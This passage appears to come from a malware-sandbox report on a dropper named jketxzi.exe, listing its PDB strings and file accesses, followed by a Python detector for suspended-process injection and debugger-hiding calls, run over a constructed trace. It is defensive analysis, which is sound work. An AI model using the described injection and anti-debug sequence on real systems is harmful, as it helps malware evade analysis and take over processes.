Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.5.dr
      Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: mozglue.dll.5.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: nss3.dll.5.dr
      Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.5.dr
      Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.5.dr
      Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: api-ms-win-core-memory-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: api-ms-win-core-debug-l1-1-0.dll.5.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.5.dr
      Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.5.dr
      Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.5.dr
      Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.5.dr
      Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: mozglue.dll.5.dr
      Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: api-ms-win-core-errorhandling-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.5.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.5.dr
      Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: api-ms-win-core-console-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: api-ms-win-core-file-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.5.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.5.dr
      Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.5.dr
      Source: Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.5.dr
      Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.5.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.5.dr
      Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.5.dr
      Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: api-ms-win-core-datetime-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.5.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.5.dr
      Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.5.dr
      Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.5.dr
      Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.5.dr
      Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.5.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.5.dr
      Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.5.dr
      Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.5.dr
      Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.5.dr
      Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.5.dr
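The System Summary lists the native calls that make up the second stage of jketxzi.exe: NtWriteVirtualMemory, NtProtectVirtualMemory and NtResumeThread against the copy of itself it spawns (PID 2328 to 1916, which the signature list attributes to a process created in suspended mode), and NtSetInformationThread used to hide a thread from the debugger. The following is an added example (not Joe Sandbox's behaviour engine) that detects that sequence in an API-call trace. The trace format, the `target_pid`/`child_pid` argument names and the trace contents are this example's own constructions, not a real capture; the constants are the documented Windows values.

```python
"""Sequence detector for suspended-process injection plus the
ThreadHideFromDebugger anti-debug trick, over a constructed API-call trace
(example code; trace format and contents are assumptions)."""
from collections import defaultdict
from typing import Dict, List, Tuple

CREATE_SUSPENDED = 0x00000004        # CreateProcess* dwCreationFlags bit
THREAD_HIDE_FROM_DEBUGGER = 0x11     # THREADINFOCLASS value 17
PAGE_EXECUTE_READWRITE = 0x40


def detect(trace: List[dict]) -> List[Tuple[str, int, int]]:
    """trace entries: {"pid": caller pid, "api": name, "args": {...}}.
    Returns (finding, caller pid, target pid) tuples."""
    # Per target pid: created suspended? memory written? protection changed?
    state: Dict[int, Dict[str, bool]] = defaultdict(
        lambda: {"suspended": False, "written": False, "reprotected": False})
    findings = []
    for call in trace:
        api, args, pid = call["api"], call.get("args", {}), call["pid"]
        if api in ("CreateProcessA", "CreateProcessW") and args.get("dwCreationFlags", 0) & CREATE_SUSPENDED:
            state[args["child_pid"]]["suspended"] = True
        elif api == "NtWriteVirtualMemory" and args.get("target_pid") != pid:
            state[args["target_pid"]]["written"] = True       # cross-process write only
        elif api == "NtProtectVirtualMemory" and args.get("target_pid") != pid:
            state[args["target_pid"]]["reprotected"] = True
        elif api == "NtResumeThread":
            target = args["target_pid"]
            s = state[target]
            if s["suspended"] and s["written"]:
                detail = "suspended child written to and resumed"
                if s["reprotected"]:
                    detail += " (with NtProtectVirtualMemory)"
                findings.append((detail, pid, target))
                state.pop(target)                             # report once per target
        elif api == "NtSetInformationThread" and args.get("ThreadInformationClass") == THREAD_HIDE_FROM_DEBUGGER:
            findings.append(("thread hidden from debugger", pid, pid))
    return findings


DROPPER = r"C:\Users\user\AppData\Roaming\jketxzi.exe"

# Constructed trace modelled on the report's process tree: PID 2328 hides a
# thread, spawns itself suspended as PID 1916, writes and re-protects memory
# in it, then resumes it.  The last entry is a benign control: a process
# resuming a thread of its own with nothing written cross-process.
SAMPLE_TRACE = [
    {"pid": 2328, "api": "NtSetInformationThread", "args": {"ThreadInformationClass": THREAD_HIDE_FROM_DEBUGGER}},
    {"pid": 2328, "api": "CreateProcessW",
     "args": {"lpApplicationName": DROPPER, "dwCreationFlags": CREATE_SUSPENDED, "child_pid": 1916}},
    {"pid": 2328, "api": "NtWriteVirtualMemory", "args": {"target_pid": 1916}},
    {"pid": 2328, "api": "NtWriteVirtualMemory", "args": {"target_pid": 1916}},
    {"pid": 2328, "api": "NtProtectVirtualMemory", "args": {"target_pid": 1916, "NewProtect": PAGE_EXECUTE_READWRITE}},
    {"pid": 2328, "api": "NtResumeThread", "args": {"target_pid": 1916}},
    {"pid": 1960, "api": "NtResumeThread", "args": {"target_pid": 1960}},
]

if __name__ == "__main__":
    for finding, caller, target in detect(SAMPLE_TRACE):
        print(f"{finding}: PID {caller} -> PID {target}")
```

Requiring both the suspended creation and a cross-process write before the resume is what keeps this quiet on legitimate software: debuggers and installers create suspended processes, and thread pools resume their own threads, but almost nothing benign does both against the same target.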

      Data Obfuscation: